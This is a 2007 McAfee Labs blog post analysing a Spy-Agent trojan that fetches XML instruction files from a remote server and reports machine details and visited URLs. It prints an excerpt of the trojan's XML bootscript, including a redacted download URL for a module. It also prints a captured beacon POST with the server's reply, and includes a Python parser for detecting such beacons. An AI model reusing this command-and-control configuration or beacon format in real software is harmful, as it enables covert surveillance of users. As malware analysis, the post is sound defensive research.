Pedro Bueno
Security and Malware Researcher

Pedro Bueno is a Security and Malware Researcher at McAfee Labs for almost 5 years. He also has a volunteer job at the SANS ...

Read More

Feeds & Podcasts

Blogs

Meet the Bloggers

Archive

Tags

#SecChat $1 million guarantee 12 Scams of Christmas access to live fraud resolution agents Acquisition Alex Thurber Android antivirus Apple botnet Channel Partners cloud security Compliance Consumer counter identity theft credit card fraud and protection credit fraud alerts credit monitoring credit monitoring and resolution critical infrastructure Cyber Security Mom cyberbullying Cybercrime cybermom data breach data center data center security Data Protection Dave DeWalt DLP Email & Web Security embedded encryption Endpoint Protection enterprise facebook fake anti-virus software Family Safety Friday Security Highlights global threat intelligence google government Hacktivism how to talk to kids how to talk to teens identity fraud identity fraud scams identity protection identity protection $1 million guarantee identity protection fraud identity protection surveillance identity surveillance identity theft identity theft expert identity theft fraud identity theft protection identity theft protection product Identity thieves and cybercriminals intel iphone kids online behavior lost wallet protection malware McAfee McAfee Channel McAfee Family Protection McAfee Identity Protection McAfee Initiative to Fight Cybercrime McAfee Labs McAfee security products Mid-Market Mobile mobile malware mobile security monitor credit and personal information Network Security online personal data protection online safety Operation Aurora PCI personal identity theft fraud personal information loss personal information protection phishing privacy proactive identity protection proactive identity surveillance Public Sector restore credit and personal identity Risk and Compliance scam scams scareware security smartphones social media social networking social networks spam Stuxnet twitter vulnerability Web 2.0 work with victim restore identity

XML Controlled Trojans

Tuesday, June 12, 2007 at 9:23pm by Pedro Bueno

I recently came across an interesting sample. The sample installs a rootkit.

So far nothing interesting, since lots of malware installs a rootkit. The interesting part is how it communicates with a remote site, and how it works.

Once installed on the machine, this Spy-Agent trojan will first communicate with a remote site, and download packages with instructions on how to behave on the machine. The instructions are XML formatted, like the following excerpt:

<?xml version="1.0" encoding="utf-8" ?>
<bootscript name="CoreApp::UrlMonitor" version="100">
    <downloads>
        <download service_name="CoreApp::UrlMonitor">
            <dll url="http://www.[REMOVED]/UrlMonitor.100.z.img" service_version="100" service_exported_as="UrlMonitor_Message_Handler" deleteable="" default="true" />
        </download>
    </downloads>
    <services>
        <service service_name="CoreApp::UrlMonitor">
           <parameters>
              <tn:data bytes="0">
                 <parameters>
                    <parameter name="browsers">
                       <browser name="IExplore" sname="IEXPLORE_SERVER" />
                       <browser name="Firefox" sname="" />
                       <browser name="Opera" sname="" />
                       <browser name="NSShell" sname="" />
                       <browser name="Netscape6" sname="" />
                       <browser name="Netscape Browser" sname="" />
                       <browser name="Mozilla" sname="" />

This file was named UrlMonitor, and it instructs the trojan to download the package UrlMonitor.100.z.img. Other packages are downloaded as well, such as:

  • core.101.z.img
  • Notifier.104.z.img
  • URLNotifier.101.z.imo

Several other XML instruction files are downloaded too:

  • bootup.exe.xml
  • UrlMonitor.xml

When active, one of its actions is to collect and report machine information and the URLs visited by the user. Here's an excerpt of a Wireshark network capture:

POST /cmd?op=post_url_ron HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Internet Explorer (compatible)
Host: http://www.[removed].com/
Content-Length: 582
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: AlteonP=xxxxxxxxxxxxxxxxx

<?xml version="1.0" encoding="utf-8"?>
<url-notifier><user-info><user-ip>192.168.x.x</user-ip>
<user-id>xxxxxxxxxxxxxxxxxxxxxxxxxxxxx</user-id>
<pub-id>XX8</pub-id>
<win-majversion>5</win-majversion>
<win-minversion>1</win-minversion>
<win-regkey>xxxxx-xxx-xxxxxxxx-xxxxx</win-regkey>
<useragent>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; V1)</useragent>
<browser-name>iexplore</browser-name>
<browser-version>6.00.2900.2180</browser-version></user-info>
<nids></nids>
<websites><website><name>xx.msn.com</name>
<query-strings></query-strings></website></websites>
</url-notifier>

HTTP/1.1 200 OK
Date: Tue, 12 Jun 2007 xx:xx:xx GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.11 mod_perl/1.29
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

66
<?xml version="1.0" encoding="utf-8" ?> <notification-command>
<!-- empty -->
</notification-command>
0

So, as you can see, both the reported information and the command channel itself are well-formed XML.
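A beacon like the one captured above has a recognisable shape: a POST to a fixed `op=post_url_ron` target, a Content-Type that claims form encoding while the body is actually XML, and a `url-notifier` root listing the visited sites. The following added example (not from the original post) parses a raw request with that shape and returns what it reports, so the logic could be run over captured HTTP traffic; the request it uses is constructed with placeholder host, IP and ID values.

```python
import xml.etree.ElementTree as ET

# Constructed request modelled on the Wireshark excerpt in the post; the
# host, IP, user-id and website are placeholders, not values from the capture.
REQUEST = (
    "POST /cmd?op=post_url_ron HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Internet Explorer (compatible)\r\n"
    "Host: www.example.invalid\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    '<?xml version="1.0" encoding="utf-8"?>'
    "<url-notifier><user-info><user-ip>192.168.0.10</user-ip>"
    "<user-id>PLACEHOLDER-ID</user-id><pub-id>XX8</pub-id>"
    "<win-majversion>5</win-majversion><win-minversion>1</win-minversion>"
    "<browser-name>iexplore</browser-name>"
    "<browser-version>6.00.2900.2180</browser-version></user-info>"
    "<websites><website><name>www.example.invalid</name>"
    "<query-strings></query-strings></website></websites></url-notifier>"
)

def inspect_post(raw):
    """Return the details a url-notifier beacon reports, or None if the
    request does not have the beacon's shape."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, v in (h.split(":", 1) for h in header_lines if ":" in h)}
    if method != "POST" or "op=post_url_ron" not in target:
        return None
    if not body.lstrip().startswith("<?xml"):
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "url-notifier":
        return None
    info = root.find("user-info")
    return {
        "host": headers.get("host"),
        # The trojan declares a form-encoded body but sends XML; that mismatch
        # is a useful secondary signal for a detection rule.
        "content_type_mismatch": headers.get("content-type", "")
            .startswith("application/x-www-form-urlencoded"),
        "user_id": info.findtext("user-id"),
        "browser": info.findtext("browser-name"),
        "windows": info.findtext("win-majversion") + "." + info.findtext("win-minversion"),
        "websites": [w.findtext("name") for w in root.iter("website")],
    }
```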

Looks like we are getting into the XML trojans…:)


Comments (2)

  • Augusto Paes de Barros June 13, 2007 5:27AM

    Pedro,

    take a look at our Black Hat Europe presentation this year, about botnet trends. We mentioned the use of XML by malware there. Next step, signed XML!

  • Andre Fucs June 13, 2007 2:49AM

    This is a trend! It was presented at BlackHat Europe… :-)

    https://www.blackhat.com/presentations/bh-europe-07/Fucs-Paes-de-Barros-Pereira/Presentation/bh-eu-07-barros.pdf